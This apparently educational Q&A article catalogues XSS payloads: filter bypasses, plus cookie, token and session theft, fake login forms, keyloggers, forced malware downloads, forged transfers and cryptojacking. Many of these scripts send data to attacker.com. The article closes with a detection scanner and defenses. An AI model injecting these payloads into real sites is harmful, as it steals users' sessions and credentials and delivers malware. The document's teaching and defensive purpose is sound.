
What are common XSS payloads? How to identify and protect against malicious XSS payloads?

February 21, 16:25

Answer

An XSS payload is the fragment of HTML or JavaScript that an attacker injects to carry out a cross-site scripting attack. Knowing the common payload shapes is what makes them detectable, and it tells you which defenses (output encoding, Content Security Policy, HttpOnly cookies) actually stop each one. Payloads fall into several families, each tied to a particular injection context and to its own set of filter-bypass tricks.

Basic XSS Payloads

1. Script Tag Injection

Most Basic Payload:

```html
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert("XSS")</script>
```

Variants:

```html
<script>alert(String.fromCharCode(88,83,83))</script>
<script>alert(/XSS/.source)</script>
<script>alert`XSS`</script>
```

2. Image Tag Injection

onerror Event:

```html
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert("XSS")>
```

Variants:

```html
<img src=x onerror=alert(1)>
<img src=x onerror=alert(1) />
<img src=x onerror=alert(1)//>
```

3. SVG Tag Injection

onload Event:

```html
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload="alert(1)">
```

Variants:

```html
<svg onload="alert(1)">
<svg onload='alert(1)'>
<svg onload=alert(1)>
```

Advanced XSS Payloads

1. Event Handler Injection

Common Events:

```html
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onblur=alert(1)>
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus>
<input onchange=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<select onblur=alert(1) autofocus>
<select onchange=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<textarea onblur=alert(1) autofocus>
<textarea onchange=alert(1) autofocus>
<details open ontoggle=alert(1)>
<details open onmouseover=alert(1)>
<details open onclick=alert(1)>
```

2. iframe Injection

javascript: Protocol:

```html
<iframe src="javascript:alert(1)"></iframe>
<iframe src='javascript:alert(1)'></iframe>
<iframe src=javascript:alert(1)></iframe>
```

data: Protocol:

```html
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
```

3. form Injection

formaction Attribute:

```html
<form><button formaction=javascript:alert(1)>Click</button></form>
<form><input type=submit formaction=javascript:alert(1) value=Click></form>
```

action Attribute:

```html
<form action="javascript:alert(1)"><input type=submit value=Click></form>
<form action="data:text/html,<script>alert(1)</script>"><input type=submit value=Click></form>
```

Filter Bypass Payloads

1. Case Bypass

Variants:

```html
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>
<Img src=x oNeRrOr=alert(1)>
```

2. Encoding Bypass

HTML Entity Encoding:

```html
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
```

URL Encoding:

```html
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
```

JavaScript Encoding:

```html
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<script>\x61\x6c\x65\x72\x74(1)</script>
```

3. Comment Bypass

Variants:

```html
<!--><script>alert(1)</script>-->
<!----><script>alert(1)</script><!-->
<!--><img src=x onerror=alert(1)>-->
```

4. Space Bypass

Variants:

```html
<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)>
<script>alert(1)//>
```

5. Quote Bypass

Variants:

```html
<script>alert(1)</script>
<script>alert`1`</script>
<script>alert(/1/)</script>
<script>alert(String.fromCharCode(49))</script>
```

Cookie Theft Payloads

1. Steal document.cookie

Direct Send:

```html
<script>
  const stolenCookie = document.cookie;
  fetch('http://attacker.com/steal?cookie=' + encodeURIComponent(stolenCookie));
</script>
```

Using Image Tag:

```html
<img src="http://attacker.com/steal?cookie=123" onerror="this.src='http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie)">
```

Using XMLHttpRequest:

```html
<script>
  const xhr = new XMLHttpRequest();
  xhr.open('GET', 'http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
  xhr.send();
</script>
```

Using WebSocket:

```html
<script>
  const ws = new WebSocket('ws://attacker.com/steal');
  ws.onopen = function() {
    ws.send(document.cookie);
  };
</script>
```

Session Hijacking Payloads

1. Session ID Theft

LocalStorage Theft:

```html
<script>
  const localStorageData = JSON.stringify(localStorage);
  fetch('http://attacker.com/steal?localStorage=' + encodeURIComponent(localStorageData));
</script>
```

SessionStorage Theft:

```html
<script>
  const sessionStorageData = JSON.stringify(sessionStorage);
  fetch('http://attacker.com/steal?sessionStorage=' + encodeURIComponent(sessionStorageData));
</script>
```

2. Token Theft

JWT Token Theft:

```html
<script>
  const token = localStorage.getItem('token');
  fetch('http://attacker.com/steal?token=' + encodeURIComponent(token));
</script>
```

Phishing Attack Payloads

1. Fake Login Form

Inject Fake Form:

```html
<script>
  const fakeForm = `
    <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;">
      <div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:20px;border-radius:5px;">
        <h3>Session expired, please login again</h3>
        <input type="text" id="username" placeholder="Username">
        <input type="password" id="password" placeholder="Password">
        <button onclick="stealCredentials()">Login</button>
      </div>
    </div>
  `;
  document.body.innerHTML += fakeForm;

  function stealCredentials() {
    const username = document.getElementById('username').value;
    const password = document.getElementById('password').value;
    fetch('http://attacker.com/steal', {
      method: 'POST',
      body: JSON.stringify({ username, password })
    });
  }
</script>
```

2. Redirect Attack

Malicious Redirect:

```html
<script>
  window.location = 'http://phishing.com/login?ref=' + encodeURIComponent(document.location.href);
</script>
```

Using meta tag:

```html
<meta http-equiv="refresh" content="0;url=http://phishing.com/login">
```

Keylogging Payloads

1. Basic Keylogging

Record All Keystrokes:

```html
<script>
  let keylog = '';
  document.addEventListener('keydown', function(e) {
    keylog += e.key;
    if (keylog.length > 100) {
      fetch('http://attacker.com/keylog', {
        method: 'POST',
        body: JSON.stringify({ keylog })
      });
      keylog = '';
    }
  });
</script>
```

2. Advanced Keylogging

Record Context:

```html
<script>
  let keylog = [];
  document.addEventListener('keydown', function(e) {
    keylog.push({
      key: e.key,
      timestamp: Date.now(),
      url: window.location.href,
      element: e.target.tagName
    });
    if (keylog.length > 50) {
      fetch('http://attacker.com/keylog', {
        method: 'POST',
        body: JSON.stringify({ keylog })
      });
      keylog = [];
    }
  });
</script>
```

Data Tampering Payloads

1. Modify Page Content

Modify Text Content:

```html
<script>
  document.getElementById('bank-balance').textContent = '999999.99';
  document.getElementById('transaction-history').innerHTML = '<p>No transaction records</p>';
</script>
```

Modify All Links:

```html
<script>
  const links = document.querySelectorAll('a');
  links.forEach(link => {
    link.href = 'http://phishing.com/login?redirect=' + encodeURIComponent(link.href);
  });
</script>
```

CSRF Assisting Payloads

1. Auto-send Request

Send GET Request:

```html
<script>
  fetch('http://bank.com/transfer?to=attacker&amount=10000', { credentials: 'include' });
</script>
```

Send POST Request:

```html
<script>
  fetch('http://bank.com/transfer', {
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: 'to=attacker&amount=10000',
    credentials: 'include'
  });
</script>
```

2. Steal CSRF Token

Steal Token in meta tag:

```html
<script>
  const csrfToken = document.querySelector('meta[name="csrf-token"]').content;
  fetch('http://attacker.com/steal?token=' + encodeURIComponent(csrfToken));
</script>
```

Malware Distribution Payloads

1. Download Malicious File

Auto Download:

```html
<script>
  const link = document.createElement('a');
  link.href = 'http://malicious.com/trojan.exe';
  link.download = 'update.exe';
  link.click();
</script>
```

2. Induce Download

Show Fake Update Prompt:

```html
<script>
  const updateMessage = `
    <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;">
      <div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:20px;border-radius:5px;">
        <h3>New version found, click to download update</h3>
        <a href="http://malicious.com/update.exe" download>Download Update</a>
      </div>
    </div>
  `;
  document.body.innerHTML += updateMessage;
</script>
```

Cryptojacking Payloads

1. Using Coinhive

Basic Mining (Coinhive's service shut down in March 2019, so this exact script no longer loads; the shape to watch for is still a third-party script include followed by a call that starts a miner):

```html
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.User('site-key');
  miner.start();
</script>
```

2. Using JSEncrypt

Encrypted Mining (note that JSEncrypt is a browser RSA library, not a miner; the snippet only instantiates it, so read this item as a stand-in for a loader that hides its mining code behind encryption or obfuscation):

```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/jsencrypt/3.0.0/jsencrypt.min.js"></script>
<script>
  var crypt = new JSEncrypt();
  // Execute encrypted mining
</script>
```

Detection and Protection

1. Detect Payloads

Common Detection Methods:

  • Search for <script> tags
  • Search for the javascript: protocol (and data:text/html URLs)
  • Search for onerror, onload and other event handler attributes
  • Search for eval(), new Function() and other dangerous functions
  • Use regular expressions to match malicious patterns
  • Before matching, normalize case and decode HTML entities and percent-encoding, since the case and encoding bypasses above are designed to slip past literal pattern matches
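The detection methods above, as an added example that is not part of the original answer: a small normalize-then-match scanner in Node.js that decodes HTML entities and percent-encoding (bounded, so double-encoded input unwraps), lowercases, and only then applies the patterns listed above. It also covers the Case Bypass and Encoding Bypass sections, since those variants are exactly what the normalization step exists for. The function and rule names (scanForXss, normalize, RULES) and all sample strings are this example's own.

```javascript
// Added example (not from the original answer): normalize-then-match scanner for
// XSS indicators, for log review or as a WAF-style pre-filter.
// All sample inputs below are constructed for this example.

// Named entities that matter for markup; numeric (&#60; / &#x3C;) forms are
// handled in code.
const NAMED_ENTITIES = { lt: '<', gt: '>', quot: '"', apos: "'", amp: '&', sol: '/' };

function decodeHtmlEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const code = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return code >= 0 && code <= 0x10ffff ? String.fromCodePoint(code) : match;
    }
    const decoded = NAMED_ENTITIES[body.toLowerCase()];
    return decoded === undefined ? match : decoded;
  });
}

// Percent-decoding; malformed sequences ("50% off") are left untouched.
function decodePercent(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Decode repeatedly (bounded) so double-encoded payloads unwrap, then lowercase
// and drop NUL bytes that some parsers ignore.
function normalize(input) {
  let current = String(input);
  for (let round = 0; round < 3; round++) {
    const next = decodePercent(decodeHtmlEntities(current));
    if (next === current) break;
    current = next;
  }
  return current.replace(/\0/g, '').toLowerCase();
}

// Patterns are applied to the normalized text, so they can stay simple.
const RULES = [
  { name: 'script-tag',          re: /<\s*\/?\s*script\b/ },
  { name: 'frame-or-object',     re: /<\s*(iframe|object|embed)\b/ },
  { name: 'event-handler',       re: /<[^>]*\bon[a-z]+\s*=/ },      // onerror=, onload=, ... inside a tag
  { name: 'javascript-protocol', re: /\bjavascript\s*:/ },
  { name: 'data-html-url',       re: /\bdata\s*:\s*text\/html/ },
  { name: 'dangerous-function',  re: /\beval\s*\(|\bnew\s+function\s*\(/ },
];

function scanForXss(input) {
  const normalized = normalize(input);
  const matches = RULES.filter(rule => rule.re.test(normalized)).map(rule => rule.name);
  return { suspicious: matches.length > 0, matches, normalized };
}

// Constructed samples: the first five mirror bypass forms from the answer above,
// the last two are benign and should stay clean.
const SAMPLES = [
  '<ScRiPt>alert(1)</ScRiPt>',
  '&#60;script&#62;alert(1)&#60;/script&#62;',
  '%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E',
  '<svg/onload=alert(1)>',
  '<iframe src=javascript:alert(1)></iframe>',
  'Hello, world! 50% off today',
  '&lt;b&gt;bold&lt;/b&gt;',
];

for (const sample of SAMPLES) {
  const result = scanForXss(sample);
  console.log(result.suspicious ? 'SUSPICIOUS' : 'clean     ', JSON.stringify(result.matches), sample);
}
```

Signature matching of this kind is a monitoring and defense-in-depth aid (log review, alerting, a request pre-filter); it does not replace the output encoding and Content Security Policy in the next section, because the set of bypass encodings is open-ended while the set of characters that need encoding on output is small and fixed.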

2. Protect Against Payloads

Protection Measures:

  • Encode user-controlled data on output, using the encoding for the context it is inserted into (HTML body, attribute value, JavaScript string, URL)
  • Deploy a Content Security Policy that disallows inline scripts and restricts where scripts may load from
  • Set the HttpOnly flag on session cookies so document.cookie cannot read them (this blunts the cookie-theft payloads above; it does not stop the injection itself)
  • Use safe DOM APIs (textContent, setAttribute) instead of innerHTML, document.write and similar HTML-interpreting sinks
  • Implement input validation and filtering as a second layer, not as the only one

Summary

XSS Payloads are tools used by attackers to execute XSS attacks. Understanding common XSS payloads is crucial for detecting and protecting against XSS attacks. Common XSS payloads include:

  1. Basic Payloads: Script tags, image tags, SVG tags
  2. Advanced Payloads: Event handlers, iframes, forms
  3. Filter Bypass Payloads: Case, encoding, comments, spaces, quotes
  4. Cookie Theft Payloads: Direct send, use Image tag
  5. Session Hijacking Payloads: LocalStorage, SessionStorage, Token theft
  6. Phishing Attack Payloads: Fake login forms, redirect attacks
  7. Keylogging Payloads: Record keystrokes, record context
  8. Data Tampering Payloads: Modify page content, modify links
  9. CSRF Assisting Payloads: Auto-send requests, steal CSRF Token
  10. Malware Distribution Payloads: Download malicious files, induce downloads
  11. Cryptojacking Payloads: Use Coinhive, JSEncrypt

By understanding these payloads, developers can better detect and protect against XSS attacks.

Tags: XSS